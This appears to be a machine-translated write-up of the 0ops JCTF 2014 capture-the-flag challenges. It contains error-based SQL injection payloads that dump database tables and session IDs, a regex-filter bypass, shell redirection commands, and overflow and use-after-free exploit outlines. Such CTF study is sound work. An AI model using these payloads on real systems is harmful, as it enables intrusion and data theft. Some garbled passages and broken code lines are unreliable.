Sasiki 2014/09/30 15:35
SJTU 0ops – September 11, 2014
Challenge source code: JCTF source.zip
RE
RE100
Throw it to dex2JAR +jdgui, as seen in MainActivity
NzU2ZDJmYzg0ZDA3YTM1NmM4ZjY4ZjcxZmU3NmUxODk=
Copy the codeBase64 decoding for
756d2fc84d07a356c8f68f71fe76e189
Copy the codeGoogle it and you’ll know:
How much is 2 fc84d07a356c8f68f71fe76e189, does anyone know  I think is 321 nimda} {galflj do you think
The reverse is flag
RE200
The offset from MS Dos Header to PE Header should be 0xE8. In addition, the magic number of PE Header should be changed from “PE\FF\0” to “PE\0\0” The second analysis program, the program input 9 numbers, but only the first three numbers need to carry out one operation, to meet the relevant conditions, the middle three numbers are 80, 94, 98, the last three numbers are irrelevant, and then print the flag only take the first three numbers
#! c #include <stdio.h> int main( int argc, char *argv[] ) { for ( size_t i = 0; i < 0x100000; ++i ) { for ( size_t j = 0; j < 0x100000; ++j ) { size_t k = (i ^ j) + 4; if ( i * j * k / 0xb == 0x6a && (i + j + k) % 100 == 0x22 ) { printf( "%d %d %d\n", i, j, k ); // return 1; } } } return(0); }Copy the codeThere are many solutions in The program, and then there is a constraint condition check in the program, which is quite complicated in logic. We directly tested multiple solutions and found that the group 15, 6 and 13 is the correct solution
Flag for
jlflag{15613abc}
Copy the codeRE300
The program is very cute to check IsDebugPresent, if there is Debug will be executed, so you need to use the unhidden version of the debugger or manual patch. The program then reads the keyfile, which is converted to a specific value and 0x19310918 using the Strol function (hexadecimal encoding) Xor, the value obtained is in line with the fixed value in the program, but there are obviously multiple solutions to this problem, because Strol can accept input of various formats, for example, 0xFFFFFFFF and FFFFFFFF are converted into uniform values, and extra Spaces are inserted in front of it.
Finally, the correct flag should be
0x181f0d1f
Copy the codeRE400
The code on 0x00422000 will perform an operation and then execute it! I simply wrote a search program, and the feature is that the last byte of the search is 0xc3, which is retn!
#! c #include <stdio.h> unsigned char t( unsigned short c, size_t num ) { unsigned int result = 1; for ( size_t i = 0; i < num; ++i ) { result = c * result % 0x5ED; } return(result & 0xFF); } unsigned short Table[] = { 0x00F9, 0x02C3, 0x034B, 0x0149, 0x04E7, 0x02C3, 0x012E, 0x0570, 0x0543, 0x0001, 0x02C3, 0x059C, 0x018C, 0x02BF, 0x054E, 0x0009, 0x0009, 0x0543, 0x0000, 0x056E, 0x008B, 0x055B, 0x018C, 0x0234, 0x05D9, 0x0009, 0x0009, 0x0395, 0x01A6, 0x0570, 0x0000, 0x0000, 0x0000, 0x0000, 0x046B, 0x0294, 0x0102, 0x044E, 0x0000, 0x046B, 0x0499, 0x027D, 0x0382, 0x05B6, 0x046B, 0x01FE, 0x01FE, 0x050D, 0x0390, 0x046B, 0x0471, 0x037F, 0x02CA, 0x0499, 0x046B, 0x027D, 0x033C, 0x0453, 0x01A9, 0x046B, 0x0543, 0x043D, 0x0073, 0x043D, 0x05D2, 0x02CA, 0x0570, 0x02C3, 0x012E, 0x0570, 0x0417, 0x045D, 0x0417, 0x005F, 0x0417, 0x00A1, 0x00FC, 0x0563, 0x012E, 0x005F, 0x0552, 0x012F, 0x01F7, 0x03C7, 0x0417, 0x0481, 0x0001, 0x0417, 0x02B2, 0x0001, 0x0417, 0x00A1, 0x00FC, 0x0563, 0x012E, 0x0223, 0x03FF, 0x0035, 0x0262, 0x03FF, 0x033F, 0x0262, 0x0552, 0x012F, 0x012E, 0x0469, 0x01FE, 0x0035, 0x0036, 0x0491, 0x0564, 0x0035, 0x03FF, 0x01B6, 0x0009, 0x0108, 0x0035, 0x012E, 0x0330, 0x0481, 0x0481, 0x0009, 0x03E0, 0x04A8, 0x01FE, 0x00EC, 0x0000, 0x03FF, 0x0168, 0x03FB, 0x02B2, 0x0032, 0x01DF, 0x01B1 }; unsigned char TableNew[0x90]; int main( int argc, char *argv[] ) { for ( size_t input = 0; input < 0x100; ++input ) { for ( size_t i = 0; i < 0x90; ++i ) { TableNew[i] = t( Table[i], input ); } if ( TableNew[0x90 - 1] == 0xc3 ) { for ( size_t i = 0; i < 0x90; ++i ) printf( "%02x ", TableNew[i] ); printf( "\n---%d---\n", input ); } } return(0); }Copy the codeAfter searching, it is found that when input takes 233, the first byte 0x55 solved conforms to the characteristics of PUSH EBP, so it is selected and the solved code has hard coding
jlflag{L04e_3389_admin}
Copy the codeRE500
First of all, IT was found that the APK was bong-bong reinforced. ZJDroid developed by Baidu researchers was used for unshell, and a DEX file was obtained. It was found that a FindSTR native was exec in it The binary takes the reverse order of the input string, performs two transformations A and B, and then performs two transformations C and D to A fixed string in the binary. C and D transform is a bit complicated, but we use IDA dynamic debugging to get the fixed string value after C and D transform, ignore the reverse, and write the code hEll0_Arm_W0rld
#! c #include <stdio.h> int main( int argc, char *argv[] ) { char str[] = "+nv|ai|KivO:w:vr"; char new_str[] = "+nv|ai|KivO:w:vr"; new_str[5] = str[4]; new_str[6] = str[5]; new_str[8] = str[6]; new_str[9] = str[7];   new_str [10] = STR [8]. new_str[13] = str[9]; new_str[14] = str[10]; new_str[4] = str[11]; new_str[7] = str[12]; new_str[11] = str[13]; new_str[12] = str[14]; for ( size_t i = 0; i < 16; ++i ) { new_str[i] -= 10; } for ( size_t i = 0; i < 16; ++i ) { str[15 - i] = new_str[i]; } puts( str ); return(0); }Copy the codeWEB
WEB100
According to the vim tip in the header, there may be temporary files left over from vim editing on the site, namely.index.html.swp
Find a picture of the dvorak keyboard online
One character at a time, for example
[4,4] = j
[2,11] = l
Copy the code[4,1,x,x] is Shift + [x,x]
  WEB200
View the source code on the landing page
<! --I'm lazy, so I save password into a file named password.key -->Copy the codeDownload the password.key file, open the encrypted javascript code inside, and execute it directly on the console:
Password: xssbbs
Copy the codeAny user name + XSSBBS password can be logged in, but can not use admin login.
After logging in, I found that I could make comments. According to the XSS prompt in the topic, I found the EXISTENCE of XSS vulnerability. But only X’s own XSS is not good XSS. SQL injection vulnerability was found by testing the submitted field with single quotes.
Because of comments, this should be an INSERT type injection, taking advantage of the error nature of MySQL.
Get the database:
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(schema_name) FROM information_schema.schemata )),0) or '&content=s
Copy the codeTwo databases, information_SCHEMA and KAER, were found
Get the table name of kaer
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database())),0) or '&content=s
Copy the codeThere are two tables: comment and user
Find the column name of the user table
title=s' or updatexml(0,concat(0x7e,(SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name='user')), 0) or '&content=s
Copy the codeThe user table has three columns: ID, USERNAME, session_ID
Direct session_id
title=title=s' or updatexml(0,(SELECT group_concat(id,0x7e,session_id) FROM user),0) or '&content=s
Copy the codeAdmin session_id == admin session_id = MTM5OTYyNzY1Mg
Continue to inject:
title=s' or updatexml(0,substring(concat(0x7e,(SELECT group_concat(username) FROM user)),30),0) or '&content=s
Copy the codeget
jlflag{1_d0nt_11k3_5q1m4p}
Copy the codeWEB300
To submit? Password =flag The page for identifying the verification code is displayed.
Take care to control user-agent and Referer, masquerading as normal requests.
Using distributed human flesh verification code recognition system.
WEB400
Note to http://121.40.150.205/web400/? Page =index format, there may be files included.
Try http://121.40.150.205/web400/index can get the index file to download.
View the landing page source http://121.40.150.205/web400/? page=test
Get tips
<! --action="./index.php? page=login" -->Copy the codeVisit http://121.40.150.205/web400/login to get on the source code
A regular check is performed to allow only alphanumeric and underscore
if (! preg_match('/^\w*$/m', $user) || ! preg_match('/^\w*$/m', $pwd))Copy the codeCan be bypassed by % 0A!
Whitespace is filtered and can be bypassed by /**/
Also follow the tips:
Humans shall pass, but bots will FAIL.
Copy the codeIt is found that the submission address, name, PWD, etc. of the form are changing, depending on the session, so you can use scripts to extract these changed fields.
In addition, change the user-agent to the user agent of the normal browser. This allows you to write scripts for injection.
Examples of submissions are as follows:
o5dgNIiZMEySbuCcs3r7=t%0a%27%2F**%2For%2F** %2F1%3D1%23&7PA3h66arJomMvZjEOW8=ss
Copy the codeBecause no information is displayed, the injection type is the most basic blind injection after transfer, and the correct message “This is a test account.” is displayed.
Finally, we get the flag from the user table. jlflag{a1y0u_bucu0_zh3g3d1a0}
PWN
PWN100
Connect to the server and enter the following command to get interactive
sh<&4
bash >&4 2>&4
Copy the codePWN200
The place where you change the name is the place where you add the new name after the previous name. There is a buffer overflow, and changing some of the later specific places to specific values goes into the branch of the output flag
Content = '\ n' + '1 l * 1023 +' \ n '+' 3 '\ n' + 'h' * 6 + '1 \ x00 \ x00 \ x60' + '\ n'Copy the codePWN300
Do you want to get the flag?
When reading the answer to the next question, the length of the buffer will be +1, with off by 1. It is just possible to change the variable denoting the length of the buffer to larger (0xFF), so that the stack overflow can be achieved when reading the next question NX, you can read shellcode to a fixed address and then jump to shellcode to execute it
PWN400
You can delete a message by adding 256 replies to it, but the dangling pointer is still there Modify, the newly entered content will be assigned to the same address if the length of the structure is the same as the size of the structure that was just free. Here you can fill the structure with the contents of the string. Modify again to use the use-after- Free, just call system(‘ /bin/sh ‘)
PWN500
The program is almost identical to the PWN300, except that with NX on, return directly to system(‘ /bin/sh ‘) in liBC
MISC
MISC100
Unzip the APK file (as zip) and find flag! In /res/raw/hehe.
ctf{adkankjasnfmasncmansddfmnasm}!
Copy the codeMISC200
Throw to dex2jar+jdgui, in the Broadcast Receiver onReceive function:
String str = new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf(new StringBuilder(String.valueOf("")).append('_').toString())).append('p').toString())).append('i').toString())).append('p') .toString())).append('Y').toString())).append('u').toString())).append('N').toString() + 'Y';Copy the codeThe answer is obvious.
MISC300
The ciphertext is Virginia encryption, and the keys are 12, 11, 8, 13, 25, 14. To unlock the plaintext, the following characters are contained in the ciphertext
Here is yor flag:jlflag{I_Kn0w_n0thing}
Copy the code MISC400
Curl can be found in the data directory to download the pCAP.
According to http://blog.flanker017.me/actf-misc300%E5%AE%98%E6%96%B9writeup/, find similar ideas in the adb flow of images, get the flag.
MISC500
The RGB value of each pixel of the original picture is extracted, and the lowest value of all green values is extracted, which is a BMP picture with broken head. The repaired head can display the flag